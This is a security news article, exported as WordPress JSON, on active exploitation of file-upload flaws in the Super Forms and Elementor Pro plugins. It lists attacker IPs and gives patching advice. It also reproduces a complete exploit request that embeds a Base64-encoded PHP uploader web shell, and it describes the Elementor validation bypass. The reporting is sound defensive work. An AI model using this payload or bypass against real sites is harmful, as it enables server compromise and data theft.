{"id":2688,"date":"2026-09-04T09:53:24","date_gmt":"2026-09-04T09:53:24","guid":{"rendered":"https:\/\/thedigitalfortress.us\/?p=2688"},"modified":"2026-09-04T09:53:24","modified_gmt":"2026-09-04T09:53:24","slug":"over-440000-exploit-attempts-target-super-forms-and-elementor-pro-rce-flaws","status":"publish","type":"post","link":"https:\/\/thedigitalfortress.us\/?p=2688","title":{"rendered":"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws"},"content":{"rendered":"<div>\n<p><span class=\"p-author\"><i class=\"icon-font icon-user\">\ue804<\/i><span class=\"author\">Ravie Lakshmanan<\/span><i class=\"icon-font icon-calendar\">\ue802<\/i><span class=\"author\">Sep 04, 2026<\/span><\/span><span class=\"p-tags\">Vulnerability \/ Web Security<\/span><\/p>\n<\/div>\n<div id=\"articlebody\">\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj9jQ8JSakEpnqxzsAZhwXnVvTMB0Lrbj7shOcXtSJzA30wcMTbkAIUGvSZPiBXOLeAW66Jpuysxn56W8YWD00hsCNB742oLqeyvgD8MXdIHHqwyeehyoyXx9G9c6XjxwN10Co_XVZuBkRjMquzgf9V17gh2Gw-xff0qJ9rh3sPO4tBq4OjjS0dxsl73WKT\/s1700-nu-rw-lo-l85-e365\/wp-main.jpg\" style=\"display: block;  text-align: center; clear: left; float: left;\"><\/a><\/div>\n<p>Threat actors are exploiting two critical security flaws in WordPress plugins Super Forms and Elementor Pro, according to findings from Wordfence.<\/p>\n<p>The vulnerabilities in question are &#8211;<\/p>\n<ul>\n<li><strong>CVE-2026-14894<\/strong> (CVSS score: 9.8) &#8211; A missing file type validation vulnerability in Super Forms \u2013 Drag &amp; Drop Form Builder that allows unauthenticated attackers to upload files of any type, including executable PHP files, leading to remote code execution. (Fixed in version 6.3.314)<\/li>\n<li><strong>CVE-2026-32475<\/strong> (CVSS score: 9.0\/9.8) &#8211; A vulnerability in Elementor Pro that allows unauthenticated attackers to upload files of any type, including executable PHP files, leading to remote code execution. (Fixed in version 4.2.2)<\/li>\n<\/ul>\n<p>As with arbitrary file upload vulnerabilities of this kind, an attacker can leverage them to write a PHP web shell to the site and execute arbitrary code, which can then be abused to create administrator accounts, exfiltrate data, or seize control of the entire WordPress site.<\/p>\n<div class=\"dog_two clear\">\n<div class=\"cf\"><a href=\"https:\/\/thehackernews.uk\/trust-world-update-d\" rel=\"nofollow noopener sponsored\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"lazyload\" alt=\"Cybersecurity\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhYq3TvePXpW0JIC7fXyv7A1W8KQqmb-AZqza2EuPyT0k8Nm5CwHYHISFLKXSKIAyR8JRtqEFQ4zx5jADiAkZKQ08nRWG1jCRV5YAbhKua7WaDdH1L6wsI-xOkoV4brlMfK44UwU-4Q1xqWg0uNN7sZkMCzci4RXYgWMNPHTtuKua7OR4oCbmxE10u0yKnR\/s728-nu-rw-lo-l85-e365\/tl-d.jpg\" width=\"729\" height=\"91\"\/><\/a><\/div>\n<\/div>\n<p>It&#8217;s worth noting that details about CVE-2026-32475 were disclosed by Patchstack last month. Successful exploitation requires the target site to have at least one published Elementor page containing a Form widget with a File Upload field.<\/p>\n<p><a name=\"more\"\/><\/p>\n<p>In a pair of reports published this week, Wordfence said it has already blocked over 250,000 and 190,000 exploit attempts targeting CVE-2026-14894 and CVE-2026-32475, respectively.<\/p>\n<h3>Exploitation Against CVE-2026-14894<\/h3>\n<p>In the <a href=\"https:\/\/www.wordfence.com\/blog\/2026\/09\/attackers-actively-exploiting-critical-vulnerability-in-super-forms-plugin\/\" target=\"_blank\">attacks<\/a> exploiting CVE-2026-14894, threat actors have been found to issue an HTTP POST request to \u00ab\/wp-admin\/admin-ajax.php\u00bb using the \u00absuper_submit_form\u00bb endpoint containing a file field with a Base64-encoded PHP payload and an attacker-controlled file name as below &#8211;<\/p>\n<p>action=super_submit_form&amp;form_id=2&amp;sf_nonce=04c3aa2046&amp;data={\u00absf_upload_field\u00bb: {\u00abtype\u00bb: \u00abfiles\u00bb, \u00abfiles\u00bb: [{\u00abdatauristring\u00bb: \u00abdata:image\/gif;base64,PD9waHAgaWYoaXNzZXQoJF9GSUxFU1siZmlsZSJdKSl7JHRhcmdldD1iYXNlbmFtZSgkX0ZJTEVTWyJmaWxlIl1bIm5hbWUiXSk7aWYobW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbImZpbGUiXVsidG1wX25hbWUiXSwkdGFyZ2V0KSl7ZWNobyLinIUgVXBsb2FkZWQ6IDxhIGhyZWY9JyR0YXJnZXQnPiR0YXJnZXQ8L2E+Ijt9ZWxzZXtlY2hvIuKdjCBVcGxvYWQgZmFpbGVkISI7fWV4aXQ7fT8+PCFET0NUWVBFIGh0bWw+PGh0bWw+PGhlYWQ+PHRpdGxlPk11c2hyMDB3IFVwbG9hZGVyPC90aXRsZT48L2hlYWQ+PGJvZHkgc3R5bGU9ImJhY2tncm91bmQ6IzBhMGEwYTtjb2xvcjojMDBmZjAwO2ZvbnQtZmFtaWx5Om1vbm9zcGFjZTtkaXNwbGF5OmZsZXg7anVzdGlmeS1jb250ZW50OmNlbnRlcjthbGlnbi1pdGVtczpjZW50ZXI7aGVpZ2h0OjEwMHZoO21hcmdpbjowOyI+PGZvcm0gbWV0aG9kPSJQT1NUIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBzdHlsZT0iYmFja2dyb3VuZDojMTExO3BhZGRpbmc6NDBweDtib3JkZXI6MnB4IHNvbGlkICMwMGZmMDA7Ym9yZGVyLXJhZGl1czoxMHB4O3RleHQtYWxpZ246Y2VudGVyOyI+PGgyPvCfk6QgVVBMT0FEPC9oMj48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgcmVxdWlyZWQgc3R5bGU9ImJhY2tncm91bmQ6IzBhMGEwYTtjb2xvcjojMDBmZjAwO2JvcmRlcjoxcHggc29saWQgIzAwZmYwMDtwYWRkaW5nOjEwcHg7Ym9yZGVyLXJhZGl1czo1cHg7Ij48YnI+PGJyPjxidXR0b24gdHlwZT0ic3VibWl0IiBzdHlsZT0iYmFja2dyb3VuZDojMDBmZjAwO2NvbG9yOiMwYTBhMGE7cGFkZGluZzoxMHB4IDMwcHg7Ym9yZGVyOm5vbmU7Ym9yZGVyLXJhZGl1czo1cHg7Zm9udC13ZWlnaHQ6Ym9sZDtjdXJzb3I6cG9pbnRlcjsiPuKshiBVcGxvYWQ8L2J1dHRvbj48L2Zvcm0+PC9ib2R5PjwvaHRtbD4=\u00bb, \u00abvalue\u00bb: \u00abMushr00w_upl.php\u00bb, \u00abname\u00bb: \u00abMushr00w_upl.php\u00bb, \u00ablabel\u00bb: \u00abattachment\u00bb}]}}<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjJ77Ver2pGlXJw0HxPJApLDddS4CRJkMQpT4thjRuwa4BxqnKcz1lHRipJIvySkQqE0YyfqVy1Oh5AoLT4Ud37mxnmC-oJW2gA0fVCiSgvQfevIRWfjc-nwAr_aTKmMBRn9cFTmuYklw8B5Lx2MGeQIsIHcIBbdgZmSCAd4-HlVBakDZslvcj91Z5YnLR9\/s1700-nu-rw-lo-l85-e365\/wordpress.png\" style=\"display: block;  text-align: center; clear: left; float: left;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjJ77Ver2pGlXJw0HxPJApLDddS4CRJkMQpT4thjRuwa4BxqnKcz1lHRipJIvySkQqE0YyfqVy1Oh5AoLT4Ud37mxnmC-oJW2gA0fVCiSgvQfevIRWfjc-nwAr_aTKmMBRn9cFTmuYklw8B5Lx2MGeQIsIHcIBbdgZmSCAd4-HlVBakDZslvcj91Z5YnLR9\/s1700-nu-rw-lo-l85-e365\/wordpress.png\" alt=\"\" border=\"0\" data-original-height=\"819\" data-original-width=\"980\"\/><\/a><\/div>\n<p>The uploaded file, while prefixed with the \u00abdata:image\/gif;base64\u00bb content type, is a PHP file-uploader web shell (\u00abMushr00w_upl.php\u00bb), which then acts as a conduit to upload additional payloads to the site. Attacks weaponizing the Super Forms plugin have originated from the following IP addresses &#8211;<\/p>\n<ul>\n<li>103.168.147.235<\/li>\n<li>103.168.146.131<\/li>\n<li>103.154.152.178<\/li>\n<li>103.170.97.7<\/li>\n<li>182.10.130.51<\/li>\n<li>189.4.122.140<\/li>\n<li>129.227.46.143<\/li>\n<li>64.176.209.104<\/li>\n<li>103.164.182.122<\/li>\n<li>37.9.33.62<\/li>\n<\/ul>\n<p>The malicious activity is said to have begun on July 14, 2026, before scaling a peak of more than 40,000 exploit requests on August 18, 2026.<\/p>\n<h3>Exploitation Against CVE-2026-32475<\/h3>\n<p>\u00abThe attacker submits the form&#8217;s File Upload field as an array, where the first element is empty and the second element carries a PHP payload with a .php file name, which is the structure that triggers the validation bypass,\u00bb the WordPress security company <a href=\"https:\/\/www.wordfence.com\/blog\/2026\/09\/attackers-actively-exploiting-critical-vulnerability-in-elementor-pro-plugin\/\" target=\"_blank\">said<\/a>.<\/p>\n<div class=\"dog_two clear\">\n<div class=\"cf\"><a href=\"https:\/\/thehackernews.uk\/ai-security-guide-b\" rel=\"nofollow noopener sponsored\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"lazyload\" alt=\"Cybersecurity\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiXA4q3EC_2cN4xiJDYmo1tVcCX5KORpjgj8jSp3DntuUZH4f0zu1Ru8jUwzShrquIuOxPb6q9TxJJXGuj7rxDRsXRSD34thOrXdZ9tDITDEj3Ocp0Z6GwhGekRTMhMnFjJ8UA5iSkfSnmnZrFzY5cmUlbCNiTNDNVrZvyef-AR_RLqwITnqZNi6PjeZkPC\/s728-nu-rw-lo-l85-e365\/AI-eBook-d.jpg\" width=\"729\" height=\"91\"\/><\/a><\/div>\n<\/div>\n<p>\u00abOnce written, the uploaded PHP file is placed in the &#8216;\/wp-content\/uploads\/elementor\/forms\/&#8217; directory under a randomly generated filename with the attacker-supplied .php extension, and the attacker can request it directly to execute arbitrary commands on the server.\u00bb<\/p>\n<p>Exploitation efforts targeting CVE-2026-32475 commenced on August 19, 2026, and have originated from the below IP addresses &#8211;<\/p>\n<ul>\n<li>2602:fa59:10:7a1::1<\/li>\n<li>185.196.220.85<\/li>\n<li>103.84.230.85<\/li>\n<li>103.90.148.202<\/li>\n<li>216.126.225.208<\/li>\n<li>167.254.240.75<\/li>\n<li>167.254.241.119<\/li>\n<li>114.10.17.253<\/li>\n<li>114.10.45.151<\/li>\n<li>2406:ef80:2:7d19::1<\/li>\n<\/ul>\n<p>WordPress site owners using the two plugins are recommended to apply patches for the vulnerabilities with immediate effect, scan their sites for indicators of compromise, and audit for unexpected or recently modified .php files.<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>\ue804Ravie Lakshmanan\ue802Sep 04, 2026Vulnerability \/ Web Security Threat actors are exploiting two critical security flaws in WordPress plugins Super Forms and Elementor Pro, according to findings from Wordfence. The vulnerabilities&hellip;<\/p>\n","protected":false},"author":1,"featured_media":2689,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[1202,3087,120,11,1926,1156,316,3300,492],"class_list":["post-2688","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized","tag-attempts","tag-elementor","tag-exploit","tag-flaws","tag-forms","tag-pro","tag-rce","tag-super","tag-target"],"_links":{"self":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts\/2688","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2688"}],"version-history":[{"count":0,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts\/2688\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/media\/2689"}],"wp:attachment":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2688"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2688"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2688"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}